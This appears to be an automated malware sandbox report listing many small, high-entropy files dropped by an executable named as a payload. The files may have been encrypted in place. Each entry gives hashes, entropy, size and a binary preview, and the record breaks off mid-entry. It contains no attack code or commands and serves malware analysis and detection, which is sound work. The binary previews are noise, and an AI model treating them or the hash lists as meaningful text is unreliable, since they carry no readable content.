                                                                                                Preview:<?xml....q..&7.w7.......-.x.. ..!..J|5.w{.G.z~B.}.C...07@dS.K:..0.l.!.;...;%cP...m.C..*.n.D7.....x..v...p.NOK.53?~...W.99.BW..i'..O...?.%..Me@.....W.!ha>v..%"<.$...M.[.R.Y..A.1.."........|.....C.I2........,.c.#r.Y.bq.|.....$N.c._PR.wl....?.6.rm......E.h.DT..8...............&...R..8..B.~~....]..._8...MV.......D.....M.GW.....f=.7......PNX...3k.%.B.^..8g.LP.A.d.g.:.l/..T....{...&..V.:..LWr.Vw.w....7z.&..S..i...,.t..0.....\@..#..__.Uso.S.u.S.,y.rp.c.......-...%..M.&...0qgy..{..(.nM.....i.).5......QB...>D!&.//.Y.%......^.1t>cBr.M.SWl..~.M...7.*..O.......r.%Q...;.e.|b..l,....q.c.Z\..tr.6...5....%fV..1.d<...;A..i..4.H..P....9V..2....d...y.....^..k35..c.S....H...x*..j.ev..5.f.......4q&.....|k...Kny....M..2.0k...;..n..g...S?*...f$w).,.g.....)#..l........9g\..C.0Rc@E1.).~...].|$.N...........J+...o..%.y.?. .Bg.O...r3s..3.+.......J3. .j2.Z..lT....T...*...1.......%..\......cM5...oR.b[.sK.mKIn.+...3...|)....&.;.j...#......Q.....s..TU!l9...>.T...FN.5.H
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1715
                                                                                                Entropy (8bit):7.899766838792527
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:zMvYanSmaoHcnScIaX+I/GUUh+fhzreRcCH0py8HX82qLD:z623lIA+IKA1CL8M2q
                                                                                                MD5:638F157DB04C01BB8F8A9379D271F413
                                                                                                SHA1:67E0A6337237847A36F6E5B6FBFF3A7B6A415449
                                                                                                SHA-256:72385B616EEEAD2E562D2F1355CCA6D006AE87CBD94CB2F47BD25F768C8B923A
                                                                                                SHA-512:A559F8A342AEA524342722A5BD52F298BAC11C7F0AEED79F07EA35BD24C40C38A697F4DDCAF39013677AA34590A90A0ED757CD67F25BB7375282A5FA010F1302
                                                                                                Malicious:false
                                                                                                Preview:<?xml.S....%5[......(. ...O..g....+.&.Xw.VuB}.x..Q.\.e..eb..kG%.......1E..v..,~..`..O...n...J...f.....6..}o...!.......~q7[.[.A....Y.f...2j........[.s*,.y9.g).S.{.c...w..(...."Nh...x..j92.=......w.N@s.j.....Q*.#..7U.<j.W...)k...}..u.|84..........yZ.n~-...4.R#........ .(.....v}%............!3.._._H$.T...8^.'..k...J....$..B\.O.w.... ..E.?k.bfT~.Z..H...vX:/..J..G..Id.......Q.......eh..l.+....Z.........Q.|.bc..2.;.V......v.$.}rlb.h.....ZJ..H.p].L...\.KA?..&_..R.p.@..(i.Bufm...<S1...l.^..&..u.v.....I.....;..".4~...0CO......Gsc.tQ}3...+.n...7.g8.....C.N./..P...._.cf.zu..31?G.........#8.9.Bz..]....B.T.>Zh.c2.U.c{.f...-.#0`]..I]..qD.#.=...`Bm..s..l..P@.;.I.@...bH_.$C..e.9c..Q%T',./2..]&....#.;....v..}....$...M......4]....d.....J.........T.^u.PJs.Xr...^.S...'.......3.z..h.c.....p..x..5.3d...J..tb..p........,.@.".QQ"....u=.k1.......uu..a....c.d?.q.h!.G 8EC.}/7.q.%...lK .^.c..i.........u..+u.J*.{_..5D.b$..Y.M..g....O...Y...U..X.Q.'..c.aB..L.].D+vb.==7$
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1752
                                                                                                Entropy (8bit):7.882720653746952
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:QF0xmO7nIBVb1fOwJ05LHs6AAZytYvDRGGF6JhTsh3LD:QuxmOzIxfOwJerxQtgGbhTshX
                                                                                                MD5:256DE97793118979D7C8B040C4FA8447
                                                                                                SHA1:DE642D6C12C51FE0A1C21314C8C2B912B8DAF5C5
                                                                                                SHA-256:09DAF3E26D83AB16A9ED7D1432581BFBC16E131F88DCEA12FB66FCE672199A58
                                                                                                SHA-512:C4D51E18876012CC8F8DA0318568CC46376205FA20B8E58D30D1DC4BF5107B722E865F00636C1BBDC640AFB5E8F545E8EF65430EAC7C27D8AED42152CC5277A7
                                                                                                Malicious:false
                                                                                                Preview:<?xmlm}5<.y.K.\b.g......3..L...<..i....R.f<q'..\...=._G.pX.W.......L..?Y.g.x..>...\.../.o..H...'..K.2...j.$..E<~...v.......U.X.z.M+O..].'\.9C.e.a......<7.p.3a..[/.1..-....5.>[.U........%.J....7.....v.....mf<...Q]..Yr?qX..... ..y..B@..t*...OXS(.B{4m......Z...9,...B.c.xLG{I.$.o...}PB.5.W..O....TMe.1...F.........*pM....ns>+F..E.)}....r=.X...w.......J..5....M:.G?...J.>.#...P....B..l8...p......y\..9.c.....dQp53...n.Dw.[V..i.n...I.........X........_*G.^j.F.`9.......mA.YN.S.r...L...bQ.2...K..<[nk..#.~u..........MU..W......H..../....`..eN9oO..q..".P...h.-..g{(O2...1...*.g?.....{~.....*..s.>..Pg{....\".+OGtj..u.n<F....M..|..6...o..Q...5.V).S.P}...q......o..."7.....I...&.}...E."......P........F.vK.'..9,..k<.<.7\.}j.z.|..C...v.e..:...T...}-..bH.G.........[j..nM.M..t....S...^&.0KM4B.N,.\.g..F.*q..:.C...H...yO.]........C.{H.C..E.h=o....J&.V.S4..sf.....B.T*g....Z..?d..).r...q..........).9.%.5G..@..lf..T:Q..L....6q2..NSEU..U.z2x.Tw..z.........{...b......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):7.873150490509038
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:XmsA3Ck7/XhJFPziSE16vrRAVivGgA7KYOtQgyLD:X5q9xfpM6TRAVyA7KB9S
                                                                                                MD5:A188FF7D5229A9CDDD9CDBBD47814275
                                                                                                SHA1:13F16251335B845536301A2ADD8B8B8D75C21FD1
                                                                                                SHA-256:86724C2C12F1A8120DD202C782CCD8F61C1DD0FE3A33EA07724C48D49B347F82
                                                                                                SHA-512:C1C71AF10C2D9CBFB00EC40DDA132793CF727D54A12257FF013411833336E0039A6AFF82E885081A0E3DB499EB15422C55B4360E1C7D7DF9EE4301C16208F851
                                                                                                Malicious:false
                                                                                                Preview:<?xml[.1..G.".$..".J.Cu..x-8?.K..D.\.,..F..4.W.M..Sr..NQ%... ..7}v%....&......+Ad...k...&R..W+X@.A.i..F...X.G..U~......l.. ....A=]E.....y.C].c.W..BK../.DX...-.......P.L....=/......C..i%....X.p....=.S...-6....=..j%.Y~...l.%..>....<{_kgo..~].Ro....MR..P?..C..@t.Z.qc..Z....3.i(...lp........u..eJ.8.e...G....C...;_....X..q...sq...:-..<z%\...0s..R.bBOW+.........{W..\f......Aw.........t.z..Au0Hr.%....oi.@..nV;......f5.9Z....u.C...a.K.3.e...7w..[q..jW..Cb1.......#..z....K.n._....f.T..T %.Q.Y.=...?G..D_.0..a..8;.Sn&.Q......4..9......q.Q..z.....i.)x...Q}.........U.p|......b.I.x.F.Q.*.H...*. ...4.^i.3."..2w...`.T`".n..s.r.7.L&L.&oY.M..pIt..n|s.s.}...S...m.....w;sv<.5....R.".E..r.......<g..../....OV...c`...u9...N.....x..?.t. .g.D.....iv..D..pA....H.s.5RP.NL..7HJ./..D...(...~.6...}.,..i.v.iu.......f...(.......f....1...lA..C})^.........@......x.d.u.H.................cA..=....l....}..^....N.....W...FM&.:SO....-...=....M./...\$D..P...$....?8F0.._..{
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1726
                                                                                                Entropy (8bit):7.905676478593396
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eTwwFNcIE2Ghl723QBZDdcdoIOScxAfLD:ekwVqD7EoX7m
                                                                                                MD5:8557AD150DF5BC0F6B5A89DD487392DC
                                                                                                SHA1:25A235CAE2B8A26926500FBD7EFDC1D119254DD8
                                                                                                SHA-256:EE99032BF4F0479E234D6A84C6B4A793927CE10649321AA9E910F498C3400FBE
                                                                                                SHA-512:2C89B228AB6CBD3C0EE72BAD2008A5A0F5FF3B3C0A4F8C4179E78F5F7A92596FFEBA6483F82CB1D7896D74B6045D2F5E3A7DF5E4C742143DD53879DDA3F0EC70
                                                                                                Malicious:false
                                                                                                Preview:<?xml.7p.....C.^.AG..=..U..n2}4tb-.3.2b..z.a....&.J..o.-.)....['c..a...........P.{.o_...Y.5..Z.\....V.qd-.,.ry.!.q..4(1.9..v.:...tiK.k.y..6......._..L.2..p.....c~^............. .....=+<.\9.{iM.N~Zj...u.5...6...X^.;..l...*..C..M.`.W...r=S.. Z..mtI.)...Nl<wI..B_...2g..w...n1.8.b.....i..!...........7;.....ka.(..';..C...J....s:!.........--OT.....'.g.(.&.G..n...y~....1|j^y.E.f&.vj....h..r..Y.../.....4.(V..Qs...W+.Gj@.d.Y.O.ay..D.uq....(..D.P8[.....tw..=.g.[%X;.......3>...Q...6..c>p..7b.1m..]Z../.d.....I..G.f.P.\.o.y]ud....st..B.G...3b...1m....".7&n.............Y_.Io..%.......9MJ...j...;..6...eh.t$.p?/m.u.S,..(....).....nG7..LIUI..Hl..C....... ...G..]w......_.H.o...m5.4.1..\.u.h..0..n...Xd..d.A.@.E....&ER....`....4....?...-....Ie.i...[.....qX...x.-.e...X....>.f..$^.M....a...?.OUT.j.w....G#~.H.}(.dU.;..0..H..v......Mo.i@....0o..M.l%..G./.}.......9....h..._.....|N...8.-R..........`.=....zp.Im.G....U..ff+......V.}..L....Co<....?.*....8......[.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.87809557355768
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:u4gau0Ddg4z3x+dRhpPnY0egO22J+b6nfz/YVsLD:u4BpzxKvnTH92wObgVo
                                                                                                MD5:46691EDA8FA6E449CD59E0850E549565
                                                                                                SHA1:2BD14A468387C4C3DD9454720C0AE96A27F58044
                                                                                                SHA-256:CC38767049B0209AF99C64F5617BBDD6085D95FB6A75ED645E0D50ADB9D59379
                                                                                                SHA-512:87955B2875A0AF03BDF6394BF9ACC31F4C4A7E5320D741553F540A4186283AEF2CA1A1C6A5C674812F1555B5899D23A7766E15DBF6EDB5F4D540044E65C7879A
                                                                                                Malicious:false
                                                                                                Preview:<?xml..P.....7.T.....l..Q..k.\iF.3.Mi..;.....:.C..X>..Ox....9......&...8...B"/d.uy.5.../...f..o........GyN..VZF..~B?..?.GQ....4.!u...3.{<........>3N....w...(7..n"6....{)ey...1..O.6c.....H...r....p+O).....?t..x..t. ....C?...}.pI..}.a./........W._..e."...`T.....B.{..t .....c....i.t.nie.....B. .m.vaRI..gU......1,.G.;.......O_..)+..7$... We..3.O|l..t....w)z.[qO...\...6.........e..)......G..I...1......\D..3..k....N...~.K.!...:...+F...k.{.yG+.....+*....P.(..YY..p.>>.}oW)............."a._a_..>......#..&(7JD...h~U.e.C.d.)..$.@.=gs"......rk.3..D.....}. 5...yx...`...l'..z.Dy...G].....K...[..CO.2.....4..g.V....E.8..:./.....q. 6..U.:.y....v0..... 9.V.~._..[-=c..E..H...y..........I'...g.C..U....r.....'..&^.b.u.DF;F..odw..O8..d......=......*t.......^kR<..I..C. ...8..Q.-r4b.....N$^.c.D..._!...'.N.d....T..<....B^Q].Q.v..'._.vl.R........P.|s...ekO..w".<.....E.u.h."..|....I..xK "...W..C..F.=\..jn...D....2....F9.. ...io..A.J<.*...C..\...Cj....2,...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.876075854886813
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:32f4AFJfPwHdJXDpvA1Hoqb6ZhIq+w+bnuxZLD:32N5IHdpAHoqmZKwanu3
                                                                                                MD5:090C6818FEEBB5A92BC56C15A76E969D
                                                                                                SHA1:840C5E819214101993706C12E052471402F38FED
                                                                                                SHA-256:1B88C07FC7F515E72981FDC6120ABE2D835FDA0A8A605D16EE14AE04C5AF5FB3
                                                                                                SHA-512:6CF7621C64032AD7E7D95C26EDB54E7FC50FA8976E0836924B48DEF8AE6222D7729AA56B2E0784A29DDAB69B63DD7A0BE60B8FE85442D3B81437693E79DDFE57
                                                                                                Malicious:false
                                                                                                Preview:<?xml..,$ .`d...V+-F.d.3". ..c.....^.b.Caw..V..?.Zad,....!zl....\k. ...F.b...ca.9.AE...6*I.G-....*U^....2.BX.=...V...Qcu:MX.K...1.JS..z..V.Wu..W.....c.S>.7W..P).\.0X.I...R$.BX...C....D./s..M.Y`~b.APwA#.ymN..#T.n.E....W.F\..F...[Ci.U.U.l.....'.``.R.!wOe.......n.>...7c.y.Y....:. ).$.4#.].N.x&.L....8(.j. .U.H....t;..i......E{p..t..._t..~..[#...>......"2I.zgEQ.GVq..K...`.B~...}...MB.D*.:.j* V#LyD.P..#..>..f~...~;l.{.Po.$........N......[]4B.a.~K.`.q..x(.zrn.N[..sC...`.4......d........R...4]b...{...[iQ.AQ.~Pw..#z]c$.Y..m..;...s?.p\..........d......Z......{.."/..,#x\.) ..,+4...^.7.4.......Q..T... .B.r..8..Y...[m.4u.c.2........+&ZZ.|....=RC.%r...I..cYK..Nc.Rq.6..w/.]1E>.!c.A.!....@..#. ..?..}.=sd.g.q..K7N...H.~.....g..Lp.......]....R............T.....a..&H...`..sny._.I@.CbTpj...../...(Z._.I..$......s...l.4OV,r.NB.e.U.....~..."....c-u..9......#}gVG5Rk/.v..|=u%.F.S\.'^......v.A....<.ha....7....e......U}9..?j[......)...E..-.r.V. ...7b..{....9#L...8.;y..`...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.8828456377028955
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:gJQXxQGuTEqVSHxArWN74G3sZZ0IXPBuC04LD:lwgqVSHsysG3sRoM
                                                                                                MD5:60CCC781AFDF78BFA4ACBF7DC4A66B92
                                                                                                SHA1:EDF5B2ED5D94C52D1DC0C330AC4EA3BABA091D6C
                                                                                                SHA-256:590A4C324417B82F96E7E8E85979EA0B328F39A9C5048FE0E3C205D2EEC2B353
                                                                                                SHA-512:C630ADC4AEC9F6159696C28C5DAC99DF0AFCF1374B03CF1AEA18C8A4E18B4920FA9AAA18369FB3A3809F483E5205507D908908270C152083876FE56C494CEBD5
                                                                                                Malicious:false
                                                                                                Preview:<?xml.o../.l...].....[&.,u`.........W:.H3_D..e..z.....27.......a......%........!...v.-z^...VF..Wj.R..2.Op.A..t..A...P.".<24".n.T...KsH.,G_7.Q..........+....'f.....9.su....Y.nh.8r.w.!?..!......A.../.......H..69....K7<..O.x......."...FA..g....{c.UG......$.I.G.s......p.|.....L..0..a...."....].q..{+kO.=.*n..u+.D....Y..6...h.T/..5._V&..q...i.A.......1i...~1w.tf5A..u...`>.....Z....<.-2.....Q.g.../..6f.(.v%u...o.t.*..fC/u/........(..T\9.<.q./.RJ.../....m...U.4...f..=..a..2.r..l.C....Q..g.{V..V.C..K................G:.U..u.".$.x.....H..}....7..hk,...MTiB...}d#...'u..\.s..AUj.+.qs&T.....\..u...l..|.D.O..>\....q.e.wm.M?Z....wM..?k....J.X.TX.........Q7......_.....w..K.w._FR.]=.c.6.Y..X.F.Rc.=of.S.(<....'.f..>:.......PL[l.b....LJ.'.,.....@0...&k..(.U.|.k.dH...._. .o.....G.W.......j.fX,r..x..I..1&.D....D."w..M*....nX.....2.........#.e.C4......$.._<.6G........E...p!..D..0..2..t...g.......}...+......6....K'...T..."8={....'pjU.I..K.M..FL...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.889512972431474
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:EoU5RKxIxUVDDzljactshYEEZam2qAAdaZywK5zyLD:EoUC5Z1aysh4EQvJw2O
                                                                                                MD5:491BB999BB87D9FA1D492541E1F433EA
                                                                                                SHA1:E9B5A2833AA7D548FB7330DD92C4D5BA4A9AB13B
                                                                                                SHA-256:F338351393A741D3D25F32778F35611E155D6C4794D8ACD594782A38ABAF6E47
                                                                                                SHA-512:14E852093AE4308FEC862E1AC32EE25969106087EC04463D8B51854797B39B2DB8142D3319025CCE3891017BB22A361CBD62448E9DC8EB004024D7D465112B4E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.X..2#`....z.;...O...Is..i...M$.>.!...V...4..x.d_~)Z.ae..(.(.^...F..g.S2...g.F..R...n.>N.I,'$C.Zd.-...:..UJ~..........;..DDg..Y.;..^.k...+.....0.....q"l..c..9..7S..;...{a.wI0.~...XzW}.j.....1......=&.^.|6..:.S3P.1.{..4.l.Ruf./....~RQ....Y.R......A..5L.....K>..W"..T.........-..t3.q..h_.LN..]d....x..|8...o@P.oS.FG\v.=.4..uA.Jp...>."\BiV.w6.g...v..bV...UQ|..ogPz.....dM@...$'p.A[_d....$...jF.'a..Yq..!hr...+....0........2.2._.)+..e.DW.8z.K...P..i6u.f..h.X....~}mK..N...a.....$.FW..,.O.aF=n.....x...0...q...L!.h]....8.K.F.T.Z...<.r....-..&.e..&#d8....E..KU..t..7......n^..S5...B.j...n.U.q.@../......J....>*..-.....M...#..T..]6k.X..lc`.({.;..........l...+x.y.....8....r......y..p'.G.......>.;...>o...whNX....>...E.VO.N........(.g#......C@.....M.o..OE...!...!x..ZgXK.2...Mu'ZT)..<N....".Ti..qA..!...X....at...Hl.......7.M .]..........G*.@?....n.,|..k..../."..9...3m...c.Z.~u...Y..y..Gl..@Zt.......<F.U5.^.>FU......}ON+G...r...?.6...ox.RO.I..c....(
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1713
                                                                                                Entropy (8bit):7.879856734185095
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:B5Vtk6x7dv99sFoGUFEXQJjsGwTXjGdDx7mVzSjLD:HV/NaUmXQtsGiTGdD5wza
                                                                                                MD5:4D897002C237E7738794F0D2017D49B6
                                                                                                SHA1:BB88D2ADC4FBD49E9544A2BB6214F23BF140A600
                                                                                                SHA-256:5DB6A5347A4F21C79886F607DAA612CFD611CE2B1FFF0D9BAA246ECAFEDFB231
                                                                                                SHA-512:DFA5E7FFD047BCEE04CF4D5F310555F6CBC532D953FB84BDADF2E8B1053CB91B3C3FB12F6E883429599CE264D6CA6FB051196C0BBD58D9C53A76B01B4F5B9B6B
                                                                                                Malicious:false
                                                                                                Preview:<?xml..2..FL"r.c....@d.L....M.P.........#..9d.U....s.z.........+......|.....>...r6.UPj...]....WC1L..;.._%C...L..b7....L*.....Pe~$.cbA0j...j.........u.;..0.......=>G.g.+,.*..&.h...N..V.3...~.....{.(..S.....\.F..d?.$..ve=}..&...~._.VX.J..(...=C..W.....,..GN.MQj.L`U...A.n...4.orv.,~F\.7..<........)ol..;....Em..WD..Sonz..%...Q..."."y....v......m..@K.I.f.L.?.O..q..y*57.J-..T.8...Z>.8..`..C....KDCE..:..,q.G....o ..<..p.9..]..%.m...=.(s..X.c...K^..o.O.U-U8&..o(y@........\.;.m.6...N.x..8...$.@........C...Q......y..Y9e.l....!<S..(q.;..!.rL...q.:~.{.AD..M.........:...*..z$)c..P^Y6.{. Z..'^.W(...HC..D..S1.v.].....I....../s.:aq..1....U*.c'.JwM.. ...9nb..`..{......W.@..h.e...=.J.Ft#.c%.eQ.[......\kd..[.^..a..c..nUv....W...d...)-......u.W#.2@^..Gt0wG..k.N....mG...Q...]..v.......t...{.}..<O.P.X..RG.0\B..#r..KD....*.B..&Olxi..)j.aI..U...L...hJRT..7.(z..\.1y.H..e..M"EBAW~..A.....b=..$..c...%.....M...p.(.;....e..A.A:...N...+....6A.e..Wj.$.f..L.L....tz.M.....8..T.m+.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1750
                                                                                                Entropy (8bit):7.887344120345237
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:mJjufnIH/lDJCpSX+ilMG1wGlMAKeilb7yLD:mRuwH9VCIOiZmkxi5S
                                                                                                MD5:D9FE7ADE6504FCEE9E1FE137E55FA8F0
                                                                                                SHA1:02A974AF8A6205B1B53A73761D7F0B78DFA35912
                                                                                                SHA-256:FE9A25C86EC10D7C0F63B0778F2C9D5AEF8DD3C93CB2B0CB768CFB1BC41A36B4
                                                                                                SHA-512:671CA5FFFB5F95D1D5B297F1631A8622220288995FD475DE94BE71638C12BE68973497D8B7911E144445FB5C42DB4F4B4FF8FEDE6B476297D9B4389D9E236A4B
                                                                                                Malicious:false
                                                                                                Preview:<?xml@....MK.'.....u........w..y).V..$OG.N}...e....g%......dl.oDf.A.....'./.....9..v....*....5.O.8k..9.Hld.&...B.:7u...U)......s..Q....:./z.@...tw.^2.......U......f.9.&.<Jy..{..G..Mx.8..u...H.5.~.h@.nW.#.|....Ol.4c.*Q5.#..1..S...G...'e..e....1.~n...+..P....../L.D./.....Xq.C.$%..{.......).aQ..z.....g...r*.mA~. ..?J.. .........EM.U...-.....\{[#.m.n..m.,...>h.....&U....y..'...RC..C.2...+..../...q_d..Yc..."........^l..;....^.r..~....|}.qr.&........23..u......1c. .......G............{..F@y.h../j+..+.tQ..z..Y!h.&D.nB.:......3..`....~.7o....1....&../..V..E..A.<....Q...DT:...v....H..t5<U.V.k...d...J4.O.D......T..........>./N,.d.....Z. 1......#.......z...'.xO...-..~.Ogyfi.;.........X`.SX..h....3.6....xp..........^7..&..T.G2....a.tL.TO;..l....n...$...U...).8S.e733k.qY.n.o..A....u.............v4..pv...(0./.S+.D.A...6{.......>..s...5f.6...l...-/.L.0!.lN.....;!3.0.....^....d..E..D!V....d......%o.\.+..M.x.^wEd".......+7.........&..!)In.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1583
                                                                                                Entropy (8bit):7.878589645227139
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:RRgLb5V10T02pPWAouXGT7OGrtkI38tVqLD:RWLb5V1N6QT7OAt8W
                                                                                                MD5:AFA05D687D03539AD359BBD50B90F6AE
                                                                                                SHA1:3F4ED58232BA00E76D72A37A3CB6129F111AECB8
                                                                                                SHA-256:A235D0747DB593DC5729917103B28979EBCEE92DEEC35EC18FA68132AD3BBC76
                                                                                                SHA-512:C48A356DD9711D6CC86A1AF3B5DA3F435F4344819FFD84AE582C00EDCA2C787CE59A55E15314CEA3A204404022B3769AA1E39E5666BEAFC639F06F0674C3DB26
                                                                                                Malicious:false
                                                                                                Preview:<?xml g.OA!}VSG.8..6.9.9...:...l....7.B......]..IC.3-oCrdS.)....c...t."^.cj..p.H..!......B..l.....(n.8.....Q....{..>.#.|.. .M..".F/V.!...xE./...J.sh..5YD}[.\e##.N...g.......c...m.gL..Z....;....>kQ....l...+......I[ee.$.b]..^o.w1k.......~Ds..g.a..R`..m).8....R$...\..........X..ii..s...V...J.w...3`..&..u..+.;.YZ.......'V..s.&w.L... y7...~....;..%.O.0............E.E..........mk;...%%..a"..1-Xr..@i..@..#)...S..>Q..?.....J....[Y..!..#.....8..N..US..~.#G...>...N.^|.E..@;....X|...;L.Vk.{DC...T......*l2.....}b.e.V......d*r./D@...m/..<`..r#8.....}u..X#I{...+..(5|.PK....V;E........{..(..y4..Ei....G_..aQg....R".n....G....e.W.....M..wc..........(TAFo....H.....~.Pe.. JQ..B....@.o.Y).$.?Kiq.j.U..M.;.....V8...w..u..8.M.Cv...P.s..-.O...... .m..f-)..B.,...g..q...............oG.K..5X...K\...Q........T4..D...>.c....D.1.)..R$.........c..G..ga..........NB....@5.rns..f.+..B..!........`a.....iZi....Qk......%?....B.$v.....]..,......V.F.~.o0...e.:..5...G..R
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1712
                                                                                                Entropy (8bit):7.875350435879082
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:KmyIVJ18iSIGyQVUulMiSGpTuRjwRuKkpLD:ryItQ2v/GJCMRi
                                                                                                MD5:F76B8E33898255DBE5ABD833049246E2
                                                                                                SHA1:BDB04F9B91E208AC88D1F5C7D79D2B0C109F13BD
                                                                                                SHA-256:77ED7619ED0CC226C262F26E09EB0EED9277FFF78B7B55D44C07C857B88DC6AB
                                                                                                SHA-512:0DFC56E6210515BC09F426809E32BCCCDAD7CBC4BD439B25BF33E7E75EB5CBF77A07CC6635F36DDCBDF89BB559F20D20140299E559D3BC161183213793074862
                                                                                                Malicious:false
                                                                                                Preview:.<?...7..eL;.}..w.O)Y.8.c.Q5.u...w2.z?n.....C.5....c....j....3X.6........)....]W.xj.#......%.f.R.&...[qA}./...o.......L..XQ/.O..S.y...:...7..fI.MT..ik.......y.+.5...i/E.t...f.....L.=..... J.C.DA...ix>.&O.B..b...H.......T....."..}...U.Opo.V...O.wT..Y.-&n.."..`.....f.z.RT.}.;.2..."?@.bV..d..n...i......p...B,.Z..|.(.....^.qf!..f0c....r.]y6.._X9+r.......L`.<:s....i.8.M..^.`...41...H-.2'.P...w.I..7D..s..jI,..u..M7.;_.Os.zC.Tp..T....:.PfP9{....S[.K..{H.dW..&N...."...m....F.7.S..c4D5......q.,-.k8u.....D..0.[.C...g...B..+G...9.I\..7.."I._c..<....r......'(<....T.......(...R@.!.....v`b.)g..),....kb]V........)...T....<.Q..m...*A....Y..TG.....4. .......$.....(.a.....m..'.oH}.,..#/.D.7....M.:....L......L...v._..h...4g..dP.u.'.+.L.>........=../.....\.c.r.D@.....v..JX.....&..ZEW..f|.....(....m....UfP4..qqt.\.. .)t....;6.....w...H$.!|J.........G-/d...9.C...OJ......t...m...........CWT9Zj8"P..!....h^......Hu.x.......U.:..CK6...I{v.....4@...9VP.$.....V...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1749
                                                                                                Entropy (8bit):7.9146364030382665
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:lu8xgxtm0e7r9l8Z3L9xG6Dr41/Av4eLD:lgwxT+5xRrxv4m
                                                                                                MD5:6713DE4A7FC3E2845EADC57724DDAECE
                                                                                                SHA1:C94DCD51C232D3541FFAF006FE730653CEEA825D
                                                                                                SHA-256:392212B6B387E407C6AB05A60AE01958AFB7E7271826C38DCCC02D56239E9BDB
                                                                                                SHA-512:8D945158EFFB4DCABEF9956276DD777CE97707E3C0C89769CB3D6FFBE6AD4200B4C380EBFAE860889DCC08EA9F238A6D091CC218736863BD94A4CFA0F644431E
                                                                                                Malicious:false
                                                                                                Preview:.<?.Yt...w...)...'=p.-S.D...Y..zHP.m4.CZgfQP..=.\...Xw.MG}......G.?WW..}.G+.......}9|.-...........aq....d,..k5<.r...W9.2..}V.3.L<J..P....-a..O@-.D!a.....r.7..5..C.u./.".0<...A.....EfS....'.h:p.T..Q..%i..H..."]p..4ws.....x...T.8.2`C.T.y].9SF...*..v.h....H....56/.k.._...1'kH.&..A|a...o.....ZGM..R....... 1.....9.J.A5.v.......*.v...0!$.zeA.p;.~!.Zb%;>.... .2V@..Q.;E;.Q.V..b..B..|...q.V.L.=Q"..8..wm%....v}.....s..7.W......uh..YO.........."..cc...M.....m..|q...;...=....P..wU3..>.#....l.9....i...ZJ.f..W..@YO...b.....+...7.4...;.k.:.@..$..,......[.j.....w..U*..v...Om..%........8..Q....`.....b;JP..6..}..~.....:L.......f\.^....|......!.n...$..}%.H.."..F.Ht4..cJ..j.....jw.9<\.>......&f/?........X.r...=SuE.x...V.z..i..$...+.I...d.tb.:]US.X.O!%.s.-.......K0.P.bS.e/......c.8qV...,h.}.JT@.ef...&...S.u.g....Cxf............I.9L30.N.0.H'......M3...p... M~.G..........o.......'._cv=...*../!...F?.6.6DC.SU._^.?..2.}+$A...<.r..7...,...z.$U.......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1712
                                                                                                Entropy (8bit):7.877024360616818
                                                                                                Encrypted:false
